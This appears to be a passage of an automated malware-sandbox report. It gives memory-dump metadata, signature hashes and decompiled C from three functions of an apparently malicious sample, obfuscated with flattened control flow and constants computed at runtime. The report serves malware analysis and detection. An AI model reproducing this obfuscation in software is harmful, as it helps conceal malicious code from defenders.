                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (=2$6?$Lf$SYt$WH$j}
                          • API String ID: 0-1853663992
                          • Opcode ID: a56265a00257ee7521573b2a0ade8ca105155fdd3603d6e3703c3f423371ff84
                          • Instruction ID: 076e34aa67aa00243f3545175bb734b0c25f162e786798d65c979734ac3b36bd
                          • Opcode Fuzzy Hash: a56265a00257ee7521573b2a0ade8ca105155fdd3603d6e3703c3f423371ff84
                          • Instruction Fuzzy Hash: 9A22017150C3819FD368CF60C58AA8BBBE2BBD5348F108A1DE2D986260D7B58949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01213A6C, Relevance: 7.8, Strings: 6, Instructions: 276COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E01213A6C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t296;
				void* _t317;
				void* _t329;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				intOrPtr _t363;
				signed int* _t366;

				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t296 = E0121358A(0);
				_v72 = _t296;
				_t363 = _t296;
				_v112 = 0xebd107;
				_t366 =  &(( &_v188)[0xa]);
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xa7f575e2;
				_t329 = 0xf3b6f74;
				_v112 = _v112 ^ 0xa7f57bf6;
				_v160 = 0xb00c17;
				_v160 = _v160 + 0xffff8c1d;
				_v160 = _v160 >> 7;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x2be60020;
				_v100 = 0xaecfed;
				_t355 = 0x47;
				_v100 = _v100 * 0x5e;
				_v100 = _v100 ^ 0x4038a8f8;
				_v148 = 0x5d8832;
				_v148 = _v148 >> 0xe;
				_v148 = _v148 * 0x55;
				_v148 = _v148 ^ 0xfb138f4a;
				_v148 = _v148 ^ 0xfb1acafa;
				_v156 = 0xd0ad54;
				_v156 = _v156 | 0xf197358a;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0xe046c41b;
				_v156 = _v156 ^ 0xe0312259;
				_v128 = 0xba314b;
				_v128 = _v128 << 4;
				_v128 = _v128 ^ 0xa41671cd;
				_v128 = _v128 ^ 0xafbf0bed;
				_v144 = 0x19b960;
				_v144 = _v144 + 0xc84d;
				_v144 = _v144 << 2;
				_v144 = _v144 + 0x9efb;
				_v144 = _v144 ^ 0x006c13e0;
				_v184 = 0x1825f1;
				_v184 = _v184 >> 4;
				_v184 = _v184 + 0x9f55;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x000ab8e0;
				_v80 = 0x3761db;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x0067643f;
				_v176 = 0x30c4c1;
				_v176 = _v176 | 0xedf1185f;
				_v176 = _v176 / _t355;
				_v176 = _v176 >> 0xb;
				_v176 = _v176 ^ 0x000311fd;
				_v120 = 0x3675af;
				_v120 = _v120 + 0xffff5842;
				_t356 = 0x68;
				_v120 = _v120 / _t356;
				_v120 = _v120 ^ 0x0001d04e;
				_v96 = 0x8764a2;
				_v96 = _v96 + 0x91f3;
				_v96 = _v96 ^ 0x008667d4;
				_v116 = 0xa8f347;
				_v116 = _v116 + 0xffff0773;
				_v116 = _v116 | 0x401fbbca;
				_v116 = _v116 ^ 0x40b7909a;
				_v124 = 0x8d3db0;
				_v124 = _v124 + 0xffffcdbe;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x0003406e;
				_v180 = 0x115e15;
				_v180 = _v180 | 0x396b9ab3;
				_t357 = 0x7f;
				_v180 = _v180 * 0x32;
				_v180 = _v180 * 0x7f;
				_v180 = _v180 ^ 0xde8ec418;
				_v188 = 0x68220f;
				_v188 = _v188 + 0xffff13e1;
				_v188 = _v188 | 0x0b5e43f9;
				_v188 = _v188 ^ 0x0308cb28;
				_v188 = _v188 ^ 0x087cea89;
				_v88 = 0xb4154e;
				_v88 = _v88 << 1;
				_v88 = _v88 ^ 0x01626326;
				_v136 = 0x855f19;
				_v136 = _v136 + 0xb245;
				_v136 = _v136 * 0x51;
				_v136 = _v136 / _t357;
				_v136 = _v136 ^ 0x0059d3c9;
				_v168 = 0x44e15b;
				_t158 =  &_v168; // 0x44e15b
				_t358 = 0x4f;
				_v168 =  *_t158 / _t358;
				_v168 = _v168 + 0xffff2550;
				_v168 = _v168 + 0x2e54;
				_v168 = _v168 ^ 0x0007a068;
				_v104 = 0xc4e2f2;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x4e2d0c56;
				_v152 = 0x191f59;
				_t359 = 0x18;
				_v152 = _v152 / _t359;
				_t360 = 0x4b;
				_v152 = _v152 * 0x66;
				_v152 = _v152 | 0x67a82f25;
				_v152 = _v152 ^ 0x67e7edf1;
				_v76 = 0x773f82;
				_v76 = _v76 << 3;
				_v76 = _v76 ^ 0x03bd8775;
				_v164 = 0xdfa2a4;
				_v164 = _v164 << 0x10;
				_v164 = _v164 / _t360;
				_v164 = _v164 ^ 0xe1f644dd;
				_v164 = _v164 ^ 0xe3d7bab6;
				_v172 = 0x806f2b;
				_v172 = _v172 | 0x09d9a691;
				_v172 = _v172 << 3;
				_v172 = _v172 + 0xd5b;
				_v172 = _v172 ^ 0x4ec1b9af;
				_v108 = 0x65c2b2;
				_v108 = _v108 + 0x56cb;
				_v108 = _v108 | 0x6643a08f;
				_v108 = _v108 ^ 0x666fbd3b;
				_v84 = 0x79d442;
				_v84 = _v84 | 0xf9b6c9c5;
				_v84 = _v84 ^ 0xf9f007ba;
				_v132 = 0xf7cc86;
				_v132 = _v132 ^ 0x895b3781;
				_v132 = _v132 >> 8;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x011abe6f;
				_v92 = 0x6d7b91;
				_v92 = _v92 >> 0xe;
				_v92 = _v92 ^ 0x000bbde8;
				_v140 = 0x9696da;
				_t361 = 5;
				_v140 = _v140 / _t361;
				_v140 = _v140 << 0xd;
				_v140 = _v140 + 0xffffb5e2;
				_v140 = _v140 ^ 0xc3cb1fba;
				do {
					while(_t329 != 0x1a8bd1c) {
						if(_t329 == 0x3a6dea5) {
							E0122365D(_v128,  &_v68, _v144, 0x44, _v184, _v80);
							_push(_v96);
							_v68 = 0x44;
							_push(_v120);
							_v60 = E0122CD35(0x1211908, _v176, __eflags);
							_t363 = E0122B233(0x1211908, _v116, 0x1211908,  &_v68, 0x1211908, _v124, _v180, _a16, _v188, _v160 | _v112, _v72, _a4, _v88, _a20, 0x1211908, _v136, _v168, _v104, 0, _v152);
							E0122629F(_v76, _v60, _v164, _v172, _v108);
							_t366 =  &(_t366[0x1b]);
							_t329 = 0xef6864e;
							continue;
						} else {
							if(_t329 == 0xef6864e) {
								E012196D0(_v84, _v132, _v72, _v92, _v140);
							} else {
								if(_t329 != 0xf3b6f74) {
									goto L10;
								} else {
									_t329 = 0x1a8bd1c;
									continue;
								}
							}
						}
						L13:
						return _t363;
					}
					_push(_t329);
					_t317 = E01231AF1(_a16,  &_v72, _v100, _v148, _v156);
					_t366 =  &(_t366[4]);
					__eflags = _t317;
					if(_t317 == 0) {
						_t329 = 0xcc77c98;
						goto L10;
					} else {
						_t329 = 0x3a6dea5;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t329 - 0xcc77c98;
				} while (_t329 != 0xcc77c98);
				goto L13;
			}















































                          0x01213a76
                          0x01213a7f
                          0x01213a86
                          0x01213a87
                          0x01213a8e
                          0x01213a95
                          0x01213a9c
                          0x01213aa3
                          0x01213aaa
                          0x01213aab
                          0x01213aac
                          0x01213ab1
                          0x01213ab8
                          0x01213aba
                          0x01213ac5
                          0x01213ac8
                          0x01213acf
                          0x01213ad7
                          0x01213adc
                          0x01213ae4
                          0x01213aec
                          0x01213af4
                          0x01213af9
                          0x01213afe
                          0x01213b06
                          0x01213b15
                          0x01213b18
                          0x01213b1c
                          0x01213b24
                          0x01213b2c
                          0x01213b36
                          0x01213b3a
                          0x01213b42
                          0x01213b4a
                          0x01213b52
                          0x01213b5a
                          0x01213b5f
                          0x01213b67
                          0x01213b6f
                          0x01213b77
                          0x01213b7c
                          0x01213b84
                          0x01213b8c
                          0x01213b94
                          0x01213b9c
                          0x01213ba1
                          0x01213ba9
                          0x01213bb1
                          0x01213bb9
                          0x01213bbe
                          0x01213bc6
                          0x01213bcb
                          0x01213bd3
                          0x01213bde
                          0x01213be5
                          0x01213bf0
                          0x01213bf8
                          0x01213c08
                          0x01213c0c
                          0x01213c11
                          0x01213c19
                          0x01213c21
                          0x01213c2d
                          0x01213c30
                          0x01213c34
                          0x01213c3c
                          0x01213c44
                          0x01213c4e
                          0x01213c56
                          0x01213c5e
                          0x01213c66
                          0x01213c6e
                          0x01213c76
                          0x01213c7e
                          0x01213c86
                          0x01213c8b
                          0x01213c93
                          0x01213c9b
                          0x01213caa
                          0x01213cad
                          0x01213cb6
                          0x01213cba
                          0x01213cc2
                          0x01213cca
                          0x01213cd2
                          0x01213cda
                          0x01213ce2
                          0x01213cea
                          0x01213cf2
                          0x01213cf6
                          0x01213cfe
                          0x01213d06
                          0x01213d13
                          0x01213d1f
                          0x01213d23
                          0x01213d2b
                          0x01213d33
                          0x01213d37
                          0x01213d3c
                          0x01213d42
                          0x01213d4a
                          0x01213d52
                          0x01213d5a
                          0x01213d62
                          0x01213d67
                          0x01213d6f
                          0x01213d7b
                          0x01213d80
                          0x01213d8b
                          0x01213d8c
                          0x01213d90
                          0x01213d98
                          0x01213da0
                          0x01213dab
                          0x01213db3
                          0x01213dbe
                          0x01213dc6
                          0x01213dd1
                          0x01213dd5
                          0x01213ddd
                          0x01213de5
                          0x01213ded
                          0x01213df5
                          0x01213dfa
                          0x01213e02
                          0x01213e0a
                          0x01213e12
                          0x01213e1a
                          0x01213e22
                          0x01213e2c
                          0x01213e39
                          0x01213e46
                          0x01213e4e
                          0x01213e56
                          0x01213e5e
                          0x01213e63
                          0x01213e67
                          0x01213e6f
                          0x01213e77
                          0x01213e7c
                          0x01213e84
                          0x01213e92
                          0x01213e9a
                          0x01213e9e
                          0x01213ea3
                          0x01213eab
                          0x01213eb3
                          0x01213eb3
                          0x01213ebd
                          0x01213ef4
                          0x01213ef9
                          0x01213f02
                          0x01213f0d
                          0x01213f1d
                          0x01213f92
                          0x01213faa
                          0x01213faf
                          0x01213fb2
                          0x00000000
                          0x01213ebf
                          0x01213ec5
                          0x01214010
                          0x01213ecb
                          0x01213ed1
                          0x00000000
                          0x01213ed7
                          0x01213ed7
                          0x00000000
                          0x01213ed7
                          0x01213ed1
                          0x01213ec5
                          0x01214019
                          0x01214024
                          0x01214024
                          0x01213fbc
                          0x01213fd7
                          0x01213fdc
                          0x01213fdf
                          0x01213fe1
                          0x01213fea
                          0x00000000
                          0x01213fe3
                          0x01213fe3
                          0x00000000
                          0x01213fe3
                          0x00000000
                          0x01213fec
                          0x01213fec
                          0x01213fec
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $?dg$D$Y"1$[$[D
                          • API String ID: 0-1233106220
                          • Opcode ID: 134fd34f29cba4b22670cc7661a88b398ed170906425bc01edcdec5d65098280
                          • Instruction ID: 7499f54463aec2cfd926a79c0173989a9874dbd9883d02136988c300789528ee
                          • Opcode Fuzzy Hash: 134fd34f29cba4b22670cc7661a88b398ed170906425bc01edcdec5d65098280
                          • Instruction Fuzzy Hash: C3D10E725083809FD365CF25C48AA5FFBE2BBD4358F108A1DF2DA96220D7B58949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012119C0, Relevance: 7.8, Strings: 6, Instructions: 254COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E012119C0() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				void* _t281;
				void* _t285;
				void* _t286;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				void* _t301;
				void* _t331;
				signed int* _t335;

				_t335 =  &_v1156;
				_v1072 = 0x90f291;
				_v1072 = _v1072 + 0xd9fe;
				_v1072 = _v1072 ^ 0x0099b4b4;
				_v1080 = 0x97e872;
				_t291 = 0xd;
				_v1080 = _v1080 / _t291;
				_t331 = 0x6e7fa89;
				_t292 = 0x2b;
				_v1080 = _v1080 / _t292;
				_v1080 = _v1080 ^ 0x0000ab52;
				_v1128 = 0xce1f68;
				_v1128 = _v1128 ^ 0x1d391405;
				_t293 = 0x23;
				_v1128 = _v1128 / _t293;
				_v1128 = _v1128 ^ 0x00d7510b;
				_v1156 = 0x1ab415;
				_v1156 = _v1156 * 0x7d;
				_v1156 = _v1156 ^ 0x5ac1e7a5;
				_v1156 = _v1156 >> 7;
				_v1156 = _v1156 ^ 0x00a59218;
				_v1096 = 0xd4cefb;
				_v1096 = _v1096 << 6;
				_v1096 = _v1096 + 0xb17e;
				_v1096 = _v1096 ^ 0x3539ed7d;
				_v1092 = 0x25099f;
				_v1092 = _v1092 + 0xffff830d;
				_v1092 = _v1092 + 0xffff7459;
				_v1092 = _v1092 ^ 0x00248bbe;
				_v1100 = 0xa97928;
				_v1100 = _v1100 | 0xad4f66fb;
				_v1100 = _v1100 >> 7;
				_v1100 = _v1100 ^ 0x01589fbb;
				_v1060 = 0x56da0;
				_v1060 = _v1060 ^ 0xd62a4695;
				_v1060 = _v1060 ^ 0xd62d8a06;
				_v1108 = 0xa4046e;
				_v1108 = _v1108 * 0x35;
				_v1108 = _v1108 + 0xb815;
				_v1108 = _v1108 ^ 0x21f6cf78;
				_v1068 = 0xb1871f;
				_v1068 = _v1068 | 0x2d1b9d36;
				_v1068 = _v1068 ^ 0x2db0c7b1;
				_v1052 = 0x4ec5bc;
				_v1052 = _v1052 + 0x7f92;
				_v1052 = _v1052 ^ 0x0040cfb8;
				_v1148 = 0xaf3f79;
				_v1148 = _v1148 << 0xf;
				_v1148 = _v1148 + 0xffffd8d9;
				_v1148 = _v1148 + 0x7b5b;
				_v1148 = _v1148 ^ 0x9fb9a37f;
				_v1116 = 0xe95276;
				_v1116 = _v1116 + 0xd080;
				_v1116 = _v1116 * 0x50;
				_v1116 = _v1116 ^ 0x492e6145;
				_v1124 = 0x862a30;
				_v1124 = _v1124 | 0x5dbcc624;
				_v1124 = _v1124 + 0xed19;
				_v1124 = _v1124 ^ 0x5db03a19;
				_v1084 = 0x2c0a28;
				_v1084 = _v1084 * 0x1a;
				_v1084 = _v1084 * 7;
				_v1084 = _v1084 ^ 0x1f493afd;
				_v1064 = 0xaaa7e2;
				_v1064 = _v1064 + 0xffff0f89;
				_v1064 = _v1064 ^ 0x00a294dc;
				_v1120 = 0x632f45;
				_t294 = 0x52;
				_v1120 = _v1120 * 0x72;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x6152e548;
				_v1136 = 0xedff35;
				_v1136 = _v1136 ^ 0xd8e369fe;
				_v1136 = _v1136 + 0xffffa94a;
				_v1136 = _v1136 + 0x84ff;
				_v1136 = _v1136 ^ 0xd8047fe1;
				_v1152 = 0x224056;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 * 0x7f;
				_v1152 = _v1152 << 0xa;
				_v1152 = _v1152 ^ 0xd55c63cf;
				_v1048 = 0x53c998;
				_v1048 = _v1048 | 0x852243cb;
				_v1048 = _v1048 ^ 0x85793c7e;
				_v1104 = 0xb4b0a8;
				_v1104 = _v1104 + 0x7646;
				_v1104 = _v1104 ^ 0x00b0d585;
				_v1076 = 0x89172f;
				_v1076 = _v1076 ^ 0x087c2659;
				_v1076 = _v1076 + 0xffff86e0;
				_v1076 = _v1076 ^ 0x08f30a69;
				_v1112 = 0xe122a0;
				_v1112 = _v1112 * 0x26;
				_v1112 = _v1112 * 0x67;
				_v1112 = _v1112 ^ 0x721af173;
				_v1144 = 0xa059a2;
				_v1144 = _v1144 << 1;
				_v1144 = _v1144 + 0xffffebb7;
				_v1144 = _v1144 / _t294;
				_v1144 = _v1144 ^ 0x0002b34c;
				_v1088 = 0xbb0571;
				_t295 = 0x4d;
				_v1088 = _v1088 * 0x49;
				_v1088 = _v1088 / _t295;
				_v1088 = _v1088 ^ 0x00bdf199;
				_v1044 = 0x8a3abf;
				_v1044 = _v1044 << 0xd;
				_v1044 = _v1044 ^ 0x4757da71;
				_v1056 = 0x8c4fd5;
				_v1056 = _v1056 >> 5;
				_v1056 = _v1056 ^ 0x0009ecbd;
				_v1132 = 0x995135;
				_v1132 = _v1132 | 0x5c2c20ca;
				_v1132 = _v1132 + 0xffff0092;
				_v1132 = _v1132 << 5;
				_v1132 = _v1132 ^ 0x978e8efb;
				_v1140 = 0x66804f;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 >> 0xb;
				_v1140 = _v1140 ^ 0x06a45735;
				_v1140 = _v1140 ^ 0x06b64b82;
				L01232F8B();
				do {
					while(_t331 != 0x13a9155) {
						if(_t331 == 0x62cfa7d) {
							_push(_v1096);
							_push(_v1156);
							_t281 = E0122CD35(0x1211000, _v1128, __eflags);
							_pop(_t301);
							E01222EA5( *0x1235218 + 0x234, __eflags,  *0x1235218 + 0x18, _t301, _v1100, _v1060, _t281, _v1108, _v1068,  &_v1040);
							_t285 = E0122629F(_v1052, _t281, _v1148, _v1116, _v1124);
							_t335 =  &(_t335[0xb]);
							_t331 = 0x78ce451;
							continue;
						} else {
							if(_t331 == 0x6e7fa89) {
								_t331 = 0x62cfa7d;
								continue;
							} else {
								_t340 = _t331 - 0x78ce451;
								if(_t331 == 0x78ce451) {
									_push(_v1120);
									_push(_v1064);
									_t286 = E0122CD35(0x1211050, _v1084, _t340);
									E0122DD54(_t340,  &_v520, _v1104, _t286, E0122ED56(_v1136),  *0x1235218 + 0x234, _v1076,  *0x1235218 + 0x18, _v1112);
									_t285 = E0122629F(_v1144, _t286, _v1088, _v1044, _v1056);
									_t335 =  &(_t335[0xd]);
									_t331 = 0x13a9155;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1140);
					_push( &_v1040);
					E01229124(_v1132,  &_v520, __eflags);
					_t331 = 0x2227053;
					L9:
					__eflags = _t331 - 0x2227053;
				} while (__eflags != 0);
				return _t285;
			}













































                          0x012119c0
                          0x012119c6
                          0x012119d0
                          0x012119d8
                          0x012119e0
                          0x012119f2
                          0x012119f7
                          0x01211a01
                          0x01211a06
                          0x01211a0b
                          0x01211a11
                          0x01211a19
                          0x01211a21
                          0x01211a2d
                          0x01211a30
                          0x01211a34
                          0x01211a3c
                          0x01211a49
                          0x01211a4d
                          0x01211a55
                          0x01211a5a
                          0x01211a62
                          0x01211a6a
                          0x01211a6f
                          0x01211a77
                          0x01211a7f
                          0x01211a87
                          0x01211a8f
                          0x01211a97
                          0x01211a9f
                          0x01211aa7
                          0x01211aaf
                          0x01211ab4
                          0x01211abc
                          0x01211ac4
                          0x01211acc
                          0x01211ad4
                          0x01211ae1
                          0x01211ae5
                          0x01211aed
                          0x01211af5
                          0x01211afd
                          0x01211b05
                          0x01211b0d
                          0x01211b15
                          0x01211b1d
                          0x01211b25
                          0x01211b2d
                          0x01211b32
                          0x01211b3a
                          0x01211b42
                          0x01211b4a
                          0x01211b52
                          0x01211b5f
                          0x01211b63
                          0x01211b6b
                          0x01211b73
                          0x01211b7b
                          0x01211b83
                          0x01211b8b
                          0x01211b98
                          0x01211ba1
                          0x01211ba7
                          0x01211baf
                          0x01211bb7
                          0x01211bbf
                          0x01211bc7
                          0x01211bd6
                          0x01211bd9
                          0x01211bdd
                          0x01211be2
                          0x01211bea
                          0x01211bf2
                          0x01211bfa
                          0x01211c02
                          0x01211c0a
                          0x01211c12
                          0x01211c1a
                          0x01211c24
                          0x01211c28
                          0x01211c2d
                          0x01211c35
                          0x01211c40
                          0x01211c4b
                          0x01211c56
                          0x01211c66
                          0x01211c6e
                          0x01211c76
                          0x01211c7e
                          0x01211c86
                          0x01211c8e
                          0x01211c96
                          0x01211ca3
                          0x01211cac
                          0x01211cb0
                          0x01211cb8
                          0x01211cc0
                          0x01211cc4
                          0x01211cd4
                          0x01211cd8
                          0x01211ce0
                          0x01211ced
                          0x01211cee
                          0x01211cf8
                          0x01211cfc
                          0x01211d04
                          0x01211d0f
                          0x01211d17
                          0x01211d22
                          0x01211d2a
                          0x01211d2f
                          0x01211d37
                          0x01211d3f
                          0x01211d47
                          0x01211d4f
                          0x01211d54
                          0x01211d5c
                          0x01211d64
                          0x01211d69
                          0x01211d6e
                          0x01211d76
                          0x01211d86
                          0x01211d9a
                          0x01211d9a
                          0x01211da8
                          0x01211e54
                          0x01211e5d
                          0x01211e65
                          0x01211e6b
                          0x01211e9f
                          0x01211eb9
                          0x01211ebe
                          0x01211ec1
                          0x00000000
                          0x01211dae
                          0x01211db4
                          0x01211e4d
                          0x00000000
                          0x01211dba
                          0x01211dba
                          0x01211dbc
                          0x01211dc2
                          0x01211dcb
                          0x01211dd3
                          0x01211e1b
                          0x01211e3b
                          0x01211e40
                          0x01211e43
                          0x00000000
                          0x01211e43
                          0x01211dbc
                          0x01211db4
                          0x00000000
                          0x01211da8
                          0x01211ec8
                          0x01211ed7
                          0x01211edf
                          0x01211ee6
                          0x01211ee8
                          0x01211ee8
                          0x01211ee8
                          0x01211efa

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (,$E/c$Fv$HRa$V@"$}95
                          • API String ID: 0-2341880589
                          • Opcode ID: da46734d21d23b034396b7de33e0020b865d92a5e305d012533f73ae4c25ee96
                          • Instruction ID: 93c1299467bcac05a650f5ef84b58479188cfd2374ca6f926df691f5189b292f
                          • Opcode Fuzzy Hash: da46734d21d23b034396b7de33e0020b865d92a5e305d012533f73ae4c25ee96
                          • Instruction Fuzzy Hash: 5AD12F724183819FC368CF64C489A0FFBF1FBD5398F204A1DF69996260D7B58949CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012192C1, Relevance: 7.7, Strings: 6, Instructions: 227COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E012192C1() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				void* _t238;
				void* _t247;
				void* _t253;
				void* _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int* _t301;

				_t301 =  &_v1120;
				_v1064 = 0x518e17;
				_v1064 = _v1064 >> 5;
				_t247 = 0xfe82576;
				_v1064 = _v1064 + 0xffff3a42;
				_v1064 = _v1064 ^ 0x00091886;
				_v1072 = 0x5ffe87;
				_v1072 = _v1072 | 0xff757ff6;
				_v1072 = _v1072 ^ 0xff797d4f;
				_v1104 = 0xf40f5c;
				_t289 = 0x74;
				_v1104 = _v1104 / _t289;
				_v1104 = _v1104 + 0xffffa24c;
				_t288 = 0;
				_v1104 = _v1104 + 0xffffa4df;
				_v1104 = _v1104 ^ 0x00015c23;
				_v1080 = 0x353c56;
				_t290 = 0x53;
				_v1080 = _v1080 / _t290;
				_v1080 = _v1080 + 0xffff91e6;
				_v1080 = _v1080 ^ 0x0006ede9;
				_v1060 = 0xdab2d6;
				_v1060 = _v1060 | 0x2ba98b4c;
				_v1060 = _v1060 ^ 0x2bfc5ebc;
				_v1100 = 0xa97148;
				_v1100 = _v1100 + 0xffff10c1;
				_v1100 = _v1100 | 0xcccd28f5;
				_t291 = 0xa;
				_v1100 = _v1100 / _t291;
				_v1100 = _v1100 ^ 0x147e298f;
				_v1116 = 0x32183d;
				_v1116 = _v1116 + 0xffff5d9e;
				_v1116 = _v1116 + 0x393a;
				_v1116 = _v1116 + 0x6fd9;
				_v1116 = _v1116 ^ 0x003751c4;
				_v1056 = 0xe60934;
				_t65 =  &_v1056; // 0xe60934
				_t292 = 0x63;
				_v1056 =  *_t65 / _t292;
				_v1056 = _v1056 ^ 0x000b4c23;
				_v1092 = 0x4f8c2b;
				_t293 = 0x25;
				_v1092 = _v1092 * 0x68;
				_v1092 = _v1092 + 0xa422;
				_v1092 = _v1092 * 0x39;
				_v1092 = _v1092 ^ 0x322fde2d;
				_v1048 = 0x3686c2;
				_v1048 = _v1048 + 0xdee8;
				_v1048 = _v1048 ^ 0x0036f3ee;
				_v1108 = 0xc4b6cd;
				_v1108 = _v1108 / _t293;
				_v1108 = _v1108 + 0x42f6;
				_v1108 = _v1108 + 0xffff72e8;
				_v1108 = _v1108 ^ 0x000a51ca;
				_v1044 = 0x14dca0;
				_t294 = 0xb;
				_v1044 = _v1044 / _t294;
				_v1044 = _v1044 ^ 0x00096e7d;
				_v1112 = 0x4f0e8;
				_v1112 = _v1112 + 0xffff8e5b;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 ^ 0xf999ab7b;
				_v1112 = _v1112 ^ 0xbe6a739c;
				_v1052 = 0x4c4d6a;
				_v1052 = _v1052 + 0xffff9d04;
				_v1052 = _v1052 ^ 0x004d68c9;
				_v1120 = 0xf5c85b;
				_v1120 = _v1120 << 0xc;
				_t295 = 0x5e;
				_v1120 = _v1120 / _t295;
				_v1120 = _v1120 | 0x1f7d0baf;
				_v1120 = _v1120 ^ 0x1ff3417c;
				_v1068 = 0x3dcd4a;
				_v1068 = _v1068 >> 5;
				_t296 = 0x24;
				_v1068 = _v1068 / _t296;
				_v1068 = _v1068 ^ 0x000ba0b2;
				_v1084 = 0x1e3fce;
				_v1084 = _v1084 + 0xffffbb5b;
				_t297 = 0x16;
				_v1084 = _v1084 / _t297;
				_v1084 = _v1084 ^ 0x00043461;
				_v1076 = 0xd55812;
				_v1076 = _v1076 + 0x80f2;
				_v1076 = _v1076 + 0xffff0f65;
				_v1076 = _v1076 ^ 0x00d50e7f;
				_v1088 = 0x61c2c6;
				_v1088 = _v1088 + 0xffffc5ff;
				_v1088 = _v1088 | 0x0e0f1766;
				_v1088 = _v1088 + 0xffff14c8;
				_v1088 = _v1088 ^ 0x0e6b43a2;
				_v1096 = 0x764478;
				_v1096 = _v1096 + 0xffff2435;
				_t298 = 0x55;
				_v1096 = _v1096 / _t298;
				_v1096 = _v1096 + 0xffff44bd;
				_v1096 = _v1096 ^ 0x0007ba65;
				do {
					while(_t247 != 0x15230fa) {
						if(_t247 == 0xad96eeb) {
							E0122855C( &_v520, _v1064, __eflags, _v1072, _v1104, _t247, _v1080);
							_t301 =  &(_t301[4]);
							_t247 = 0xbd6821c;
							continue;
						} else {
							if(_t247 == 0xbd6821c) {
								_push(_v1116);
								_push(_v1100);
								_t238 = E0122CD35(0x1211000, _v1060, __eflags);
								_pop(_t253);
								E01222EA5( *0x1235218 + 0x234, __eflags,  *0x1235218 + 0x18, _t253, _v1092, _v1048, _t238, _v1108, _v1044,  &_v1040);
								E0122629F(_v1112, _t238, _v1052, _v1120, _v1068);
								_t301 =  &(_t301[0xb]);
								_t247 = 0xcfa61c2;
								continue;
							} else {
								if(_t247 == 0xcfa61c2) {
									_push(_v1076);
									_push( &_v520);
									__eflags = E01229124(_v1084,  &_v1040, __eflags);
									_t288 =  !=  ? 1 : _t288;
									_t247 = 0x15230fa;
									continue;
								} else {
									if(_t247 == 0xfe82576) {
										_t247 = 0xad96eeb;
										continue;
									}
								}
							}
						}
						goto L11;
					}
					E0122DB87(_v1088, _v1096,  &_v1040);
					_t247 = 0xfc68290;
					L11:
					__eflags = _t247 - 0xfc68290;
				} while (__eflags != 0);
				return _t288;
			}








































                          0x012192c1
                          0x012192c7
                          0x012192d1
                          0x012192d6
                          0x012192db
                          0x012192e3
                          0x012192eb
                          0x012192f3
                          0x012192fb
                          0x01219303
                          0x01219315
                          0x0121931a
                          0x01219320
                          0x01219328
                          0x0121932a
                          0x01219332
                          0x0121933a
